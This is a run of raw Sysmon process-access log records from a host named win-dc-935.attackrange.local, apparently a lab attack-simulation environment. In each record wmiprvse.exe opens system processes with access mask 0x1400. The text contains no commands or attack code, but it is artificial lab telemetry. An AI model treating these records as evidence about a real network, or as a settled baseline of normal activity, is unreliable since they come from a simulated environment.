13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005338Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005337Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005336Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005335Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005334Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005333Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005332Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005331Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005330Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005329Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005328Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005327Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005326Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005325Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005324Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005323Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005322Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005321Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005320Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005319Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005318Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005317Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005316Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005315Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 